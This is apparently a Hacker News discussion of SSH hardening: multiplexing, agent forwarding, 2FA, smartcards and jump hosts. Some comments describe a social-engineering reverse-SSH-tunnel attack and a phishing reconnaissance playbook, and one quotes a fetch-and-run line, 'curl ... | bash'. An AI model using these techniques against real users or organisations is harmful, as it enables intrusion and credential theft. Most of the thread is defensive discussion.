All I have to do is trick your folks into testing a ruby / python / perl / bash script for me that will drop a key on your machine, fire up ssh using that key and tunnel back to my host. Now I have full control of your secure (banking, government, eCommerce) environment, completely bypassing 2 factor authentication. Just one link to one of your email distros and up to 10% of your folks will run it.
Combine this with sudo credential caching and now I have root on all of your systems without having to bother finding vulns.
Thx to Prandium for the demo of this simple social engineering exploit.
...install a rootkit or botnet client regardless of how you've configured ssh.
What does it have anything to do with ssh at all? The attacker could just as easily set up an outgoing VPN-over-TLS in the same way.
Another reason this involves SSH is that you already have it. I am not installing anything. I am just dropping a key on your machine and (as you) spawning ssh and a reverse tunnel back to a VM I control. No need for root :-) Now I just leverage your existing multiplexed connections into your development and production environments. Your syslog server will not log me connecting, since I am just leveraging your existing channelized SSH session.
This is leveraging a bad configuration that everyone has in SSH by default. In most cases, the attacker can also leverage the commonly poorly configured sudo as well.
If my government would give me legal immunity, I would prove this to you by popping nearly every major company or government office in my country in three weeks or less.
Perhaps some of the confusion here is that it is assumed ssh keys are in use? In an environment that requires 2FA, keys would not be allowed. People would be using RSA Tokens, Duo, Yubikeys, etc. This method bypassing those things.
It also means, anyone using the defaults in OpenSSH is not PCI compliant.
I am not even sure this method of access to development or production environments is even illegal, as the user is providing access and I am not hacking anything, nor am I using authentication into anything. The door is wide open. If this were a game of chess, I would get check-mate in 1 move.
The vulnerability is the attacker being able to run arbitrary code as the user.
Running around screaming "OMG OMG, the tool designed to tunnel over the network can be used to tunnel over the network, TEH SKY IS FALLING!!1!!!" is even somewhat funny in this context.
The constant news of companies getting popped is actually quite entertaining. The only thing folks may be concerned about is that if too many companies get popped, there may be some heavy handed legislation that starts to affect people. Even that I am perfectly fine with.
(you are likewise assuming there are multiplexed connections, which is a great leap - these are off by default)
What you have demonstrated is the simplest possible botnet technique, using SSH as the transport and social engineering as the vector; for some reason, you consider it groundbreaking. Well, it would have been - in 2000.
There are literally tens of thousands of articles telling folks to enable ControlMaster (Multiplexing) on the client to "make ssh faster". You would be hard pressed to find a devops shop that isn't already using ControlMaster in their ssh client config. There are at least a handful of government and financial sites that set MaxSessions to 1 because they understand the risk.
It all boils down to "if you require security, you can't have a default-open environment"; blaming a specific tool seems ... strange.
Get permission from your privacy and legal team before you do this of course. Write a small script in whatever language you like. Encode a ... gosh, don't even get that fancy. Just email them something silly from an external email address like:
curl -s https://tinyvpn.org/ | bash
Arguably, plain HTML is also untrusted code, and I certainly don't trust every single one of the authors of my operating system and all of the os-level utilities and all the applications that I use, especially not Microsoft or Apple. But I'm forced to use them for work.
A year or two ago there was some hoopla about Canonical collecting some information about Ubuntu's users or something like that (don't remember exactly) and a lot of people were up in arms about how they don't trust Canonical. Canonical's reply was one of the most insightful I've ever read on the internet. They said something like, "um... but we've got root".
That's a great point. The makers of your OS, the builders of your apps, they have a lot of power over you that you grant them simply by using their stuff. You're effectively trusting them, even if you don't trust them.
You could react by not using anything that anyone you don't trust writes, or by thoroughly auditing all the source code of everything you use (you do use only open-source software which can be audited by you directly, right?). But this is not really practical for 99% of everyone on the planet.
Which is incredibly misleading.
Sure, they could put malicious code in their distribution. It could do whatever they want. And then it would be on your machine, where you can potentially discover it and publish what you've discovered and allow others to verify your discovery. Which could cause Canonical to not have root anymore, because people would immediately switch to Debian or CentOS or something else.
But if they send data from your machine to their servers, no one has any ability to determine what they do with it from there, how well they secure it, who they give or sell it to, etc. It's a completely different situation because it goes from trust-but-verify to blind trust.
Sure, in principle you could verify. You could read through all the source, you could even disassemble the binaries and read through the assembly (and don't forget to verify the hardware too). Again, who actually does that? Virtually no one.
So the two cases are a lot closer than you paint them to be.
Also, corporations do stupid, illegal, and unethical stuff all the time, even when it's clearly (especially in hindsight) not in their long-term interest to do so. Even when it will clearly destroy their reputation if the public found out they even considered it.
Even if you trust "the system" (which is more of a hope that if there's something malicious, someone out there will detect it sooner or later), there are many cases of vulnerabilities in even open source code going undetected for years... nevermind vulnerabilities in binaries that you don't have code for and who the authors of aren't generous enough to clue you in on.
Canonical (or whatever source you actually get your OS or apps from) could also send you some specially crafted something that no one else gets. Now who's going to verify it for you if you don't do it yourself? How are you ever going to find out, if you're not one of the ultra-paranoid and super-skilled 0.001% of Ubuntu users with infinite time and determination who actually verifies 100% of what Canonical sends them? You just won't. And if you did, there'd be a hundred new Ubuntu versions out by the time you finished verifying even one of them.
People trust, but they very rarely verify. The size of operating systems and applications and the skill to verify have all just grown too large to make it practical for the overwhelming majority of people.
I do see your point about Canonical doing whatever they want with the data they collect. That's certainly problematic. But that doesn't mean that there aren't major privacy or security issues with trusting Ubuntu (or any other OS) not to have malware on it.
Which is not the same thing as no one. And it only takes once to ruin your reputation forever (see also Sourceforge, Lenovo, etc.) Moreover, the probability of detection doesn't have to be very high at all because the cost to Canonical would be catastrophic, so any possibility whatsoever acts as a deterrent. And more so in this context because of the nature of the user base.
Your argument seems to boil down to the position that it doesn't hurt anything to go from detection not perfect to detection not possible.
In my view there are emerging best practices in this area. There are two ways to reduce this risk and both are controversial:
1. Force developers to only develop software using an SSH terminal (by first connecting to a developer VPN via 2FA and then sshing into their secure development environment where may use tools like tmux, vi, and their programming language of choice to get the job done). In this scheme copying source codes or security credentials to a developer laptop is considered a violation and becomes a fireable offense no questions asked.
2. Require all developers to run a private USB-bootable linux desktop shell which is known to be clean. In this case they remain free to utilize modern desktop editors and code emulators (such as android simulator). It's even possible to setup secure persistence in these environments so that the developer's browser configuration, network/vpn config, dotfiles, apt installs, etc are stored on an encrypted filesystem on USB device. The reason why a USB image is preferred is because it's annoying to ask a new employee to repartiation her personal harddrive.
My suspicion is that as more of the tools developers need to rely on are cloud-based: (example: github, cloud9, jenkins, etc) we will eventually see these modern best practices against client-side attacks being adopted more broadly. The quality and reliability of hot-bootable ultra secure cloud operating systems has gone thru the roof over the past couple of years and I assume this trend will only accellerate due to the fact that Google Chrome OS continues to penerate more of the market and consumers are getting used to it.
TLDR: ssh keys existing on developer harddrives is an info-sec anti-pattern, they should only ever exist in system memory or in an encrypted partition on a USB stick.
1. Company walks you through setting up FileVault (with key escrow) and VPN client, generating and uploading SSH public key immediately after unboxing laptop.
2. OneLogin + Duo (or pick your SSO/2FA scheme) for everything - internal webapps, GMail, etc.
3. SSH keys managed by Puppet.
4. 2FA verification of SSH logins (using pam-interactive), through a bastion (provided .ssh file makes it transparent), with OSX's default SSH agent, with pretty much all of those best practices configured except smartcards/certs.
5. Engineers have SSH access only to utility/development boxes. You can deploy code to production through a webapp (identifying the commit ID) but you can't get a shell as your application's user, and certainly not root.
6. Webapps moving behind a VPN.
In the rare case that you need to debug in production beyond what you can get from metrics/logs, you pair with a "blessed"/senior sysadmin type.
I <3 Duo Security.
Automate the build and deployment environment on a system that developers don't have direct access. Instead of pushing changes, the bot pulls a specified release branch, builds, tests, and deploys the code. All without human interaction.
If malicious code were somehow introduced from a developer's environment, it would be recorded and reflected in the commit history.
AFAIK, that's how GitHub manages deployments via HubBot. See https://www.youtube.com/watch?v=NST3u-GjjFw.
To take things a step further, public-facing environments should be made immutable wherever possible. With the entire system being built and released as a whole. Docker alleviates some of the complexity and overhead but I think this space is where Unikernels have a lot of potential to shine.
There's a very good talk about how the Wunderlist team used chaos and frequent destruction of their envronments to overcome fear and uncertainty here. https://www.youtube.com/watch?v=RrX_28s70ww&app=desktop.
Emphasis being placed on the the frequent disposal and recreation of environments rather than building long-running persistent environments.
This setup probably won't work for long-lived systems (ex databases). In those cases, access via a transient environment like a USB bootable OS would be ideal to prevent persistent viruses/trojans. Ironically, the best current options are security-focused distros like KaliLinux that put a special emphasis on avoiding persistent state. Maybe one day soon we'll see an admin-focused OS that better fits this role.
Most complex systems fail in unexpected ways, and the best way to debug is to grant the devs access to production machines. It can be temporary, monitored and through a secure channel, but it's still something most organizations can hardly live without.
So yeah, most organizations couldn't do this today, because they don't have the deploy process in place. But when an organization has made the switch, then it is much more realistic to assume that it can get along without granting ad hoc ssh access to production systems.
Hopefully, this practice -- and the tools required to make it happen -- get better with time.
It's also the least likely to happen. Attackers will have broken deep into your database due to poor webapp security before getting a hold of your ssh private key.
Not that SSH security doesn't matter. It's easy enough and carries enough risks that putting some effort into it is worthwhile.
A motivated attacker will always tend to try the "low tech" approaches first to rule them out as a first step because it it doesn't require as much sophisticated technical attention and in addition it's a well known fact that human beings are more often than not the weakest link in the chain of security.
It goes something like this:
1. enumerate the employees.. in other words build a list of all their work emails and try to obtain their personal emails and those of their spouses and children.
2. investigate the background of executives so that a compelling phishing email message can be crafted which looks like it originated from high up within the organization.
3. Send targeted phishing emails designed to bait people within the organization to visit webpages that exploit Adobe Flash attack vectors or other browser based vulnerabilities, or perhaps even lure them into installing a trojan directly.
4. after someone in the organization falls victim to the client-side attack, read their emails to learn more about the organization's structure so that your next phising attack can be more refined, specific, and compelling and can possibly utilize a real corporate email address.
5. Rinse and repeat until you eventually gain access to a developer laptop where you can grab production environment SSH keys. Now you own the network without even having to scan a single server and without leaving a trace in the log files.
For startups, the #1 risk is a vulnerability in some web app, or a forgotten admin panel, that leaks the entire database to an attacker. Not a complex attack conducted by a nation-sponsored offensive team.
But again, SSH security matters, you should take it seriously.
I think that you may have a dangerous attitude about it because in modern times it's not a question of whether or not you're a big enterprise or a startup it's a question of whether or not the dataset at the nucleus of your system would be valuable on the black market or not. If an attacker or group of attackers thinks that your dataset could be saleable one day in the future as your company continues to grow then instead of trying to buy your equity
on the secondary markets they may invest in trying to "own" your infrastructure now before you become big enough to put your employees thru white-hat training around social engineering.
I suppose my point here is that it does make sense for startups to put their team through proper white-hat training but it doesn't have to be expensive because you can roll your own. What I suspect is that in 10 years or so this kind of anti-social engineering training will be a standard for any IT knowledge workers not just programmers and will likely be part of the job interview process.
We are aruging over something moot though, since we both agree.. take it seriously.
> Host B
> ProxyCommand ssh -W B:22 A
> Host B
> ProxyCommand ssh -W %h:%p A
Saying "they are public so it's ok" is technical oversimplification.
The word public is just a name for a kind of key defined in the field of cryptography and doesn't necessary hold the same connotation in application protocols that use public key cryptography. One example would be ephemeral public key that would have to be kept private to be able to retain forward secrecy (although in such schemes DH is usually used).
Consider as well this situation that is closer to SSH. Suppose that you are MS dev working on NT kernel that by night also want to anonymously contribute to Linux. Obviously both camps would not like you to do that for fear of copyright infringement but OpenSSH shouldn't betray you anonymity that could be reasonably expected. It's imaginable that only one public crypto key pair would be needed to authenticate the server if password authentication is used for the client. The user doesn't expect the client software to silently generate key pair, much less that the same pair is used for every domain because the pair is not strictly needed. Although the user should inform himself how the software works a good software similarly shouldn't work in ways that are reasonably unexpected to people that are familiar with the domain. Ideally, if OpenSSH developers can't really foresee it working any other way OpenSSH should at least explicitly inform the user which public key will be used in connection before it is established in order to not assume the consent of poorly informed users.
It's not. The whole idea of the scheme is that you can publish them everywhere with no risk.
Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.
How? That's now how public key auth works...
> Not sharing public keys between different services and contexts (eg not using your Github keys for anything else) mitigates this risk significantly.
This is true for other reasons, and you can automate it with some shell scripts.
This means that a malicious client with just the public key can probe to see if a server will accept a given username/public key combo. If the server does, it will challenge you to authenticate that you hold the private key (which you'll have to fail, since you don't have it).
Well that's an ... interesting (read: stupid) design choice. I get that it reduces load on the server, but how many public keys is one user likely to have? Surely you could do something with ring signatures to make it not even require knowing which key was used?
My point is you are better off designing things assuming that usernames and public keys are public information. That doesn't mean you have to go publish them on your website, but you also don't need to worry about mitigating it if someone else does.
One of the main uses of smartcards is to use it on other machines (eg: not mine). What's the added benefit of adding one if I'm logging in from my local machine?
I use PIV (NIST SP 800-73) compliant smartcards with a PKCS#11 module I wrote (CACKey), it just works with "ssh-add -s /path/to/libcackey.so", then SSH away.
Additionally, there is a fork of OpenSSH called PKIXSSH that adds X.509 certificate support (in addition to the relatively recent, compared to the fork, support for OpenSSH certificates) and then I can authenticate to remote systems using my certificate -- which is helpful when my card is replaced, or if my certificate is revoked the CRLs can be used.
And that sudo workaround is bad since it requires agent key forwarding, which you shouldn't use for the reasons the author himself noted a few paragraphs up.
Quite recently: Security was concerned about enforcing ssh key rotation and was pushing for sysops to generate and store (obviously - unencrypted) private keys for all users on a central jump host and provide users access to that host using passwords (for which enforcing lifecycle policies is easier).
That is slowly starting to change however. PCI DSS 3.0 gets a bit more specific and starts to go down some technical rabbit holes. PCI DSS 4.0 will be even more specific and have more technical requirements (vs. checkboxes)
Here's the thing: they say they can't enforce users to encrypt passwords (hogwash; you can have a local agent that checks that), but do they check that users are providing good passwords? I have much more faith in a randomly generated key than I do in a human-generated password. The former pretty much requires compromising the machine; the latter I can just take pot-shots at the server with. (They do rate limit your SSH password attempts, right? right?)
Even if we assume that the password is good, and that the server won't allow infinite tries to guess it, the security is only equivalent: compromise of the user's local account will reveal the password (just sniff the password) or the key (just read the keyfile, and sniff the password if it is encrypted). I don't see any world in which a password is more secure than a key.
> we're not allowed to use key auth.
i.e., they're using password based auth.¹ The point of my post is that while certainly users leaving the private key unencrypted isn't good, trading that for password auth leaves you in a worse state overall (IMO).
¹Of course, they could be using an auth scheme that is neither password nor key based. But given that the parent didn't come out and say that, my gut says that's not the case here.
A user wants to write an SQL query. The user writes it in notepad or whatever, and saves it in a .sql file. The user then will right click on this file they just created, and hit "Scan with McAfee antivirus". If the .sql file they just created comes up clean, they can then open it in SQL Manager and execute it. If they want to then adjust the query, they have to close the file and start over, running the scan again. People can and have been fired over getting lazy about that process.
There's a security consultant with a clipboard who firmly believes this improves security.
For extra credit, set up port knocking.
As a cherry on top you can put the password in LDAP or RADIUS server and hook up traditional 2FA (Google Auth, Yubikey, Email, SMS) for that legendary 3FA (ah... "something (else) you have"). Sounds hokey, but defense is best in depth.
3 FA is :
* Something you have (normally one OR MORE user IDs)
* Something you know (normally the associated password or passwords for the user ID(s))
* Something you are (normally biometric)
[edit: technically, it's multi-factor when using multiple user/passwords - here's a useful link https://pciguru.wordpress.com/2010/05/01/one-two-and-three-f...]
You have your fingers. You have your eyes.
In fiction and movies, these things that you have which could be taken from you (your fingers severed, your eyes plucked out) and used for getting past biometric scanners.
In real life there are easier, stealthier, and less gruesome methods for getting those things: just copy them. (gummy bear fingerprints, anyone? )
 - http://www.theregister.co.uk/2002/05/16/gummi_bears_defeat_f...
 - http://www.cryptome.org/gummy.htm
 - http://www.it.slashdot.org/story/10/10/28/0124242/aussie-kid...
I think biometrics may have a place in tamper-proof devices like iphones (infamous error 53) or biometric smartcards (need fingerprint to unlock secrets).
A single shared key is a security disaster waiting to happen.
You can read about this in the `CERTIFICATES` section of ssh-keygen(1).
It's still not a great setup, because it makes auditing a nightmare. (Unfortunately, a particular software package we use essentially requires it due to its bad architecture.)
> Unfortunately ssh-keygen does not support input from stdin, so this example is slightly more complicated than it should.
Any shell that supports process substitution can fix this for you with something like;
ssh-keygen -l -f <(ssh-keyscan korell)
I don't like that you have to alias ssh or replace /usr/xxx/bin/ssh with a symlink to make it work.
BTW, you can also now use hardware devices (like TREZOR and KeepKey) to perform "ssh-agent" functionality in hardware, with minimal setup work.
Blog post: https://medium.com/@satoshilabs/trezor-firmware-1-3-4-enable...
Source code: https://github.com/romanz/trezor-agent (the README has several demo screencasts).
This doesn't make sense. You can safely setup SSH agent forwarding to ssh from server to server without storing your ssh private key anywhere but your local host.
ProxyCommand ssh -W $(echo %h | sed 's/^.<asterisk>+//') $(echo %h | sed 's/+[^+]<asterisk>$//;s/\([^+%%]<asterisk>\)%%\([^+]<asterisk>\)$/\2 -l \1/;s/:\([^:+]<asterisk>\)$/ -p \1/')
$ ssh login1%host1:port1+login2%host2:port2+login3%host3:port3+host4:port4 -l login4
Edit: there is apparently no way to escape asterisks, so I replaced them with <asterisk> (hopefully I didn't miss one), but you'd better check out the link.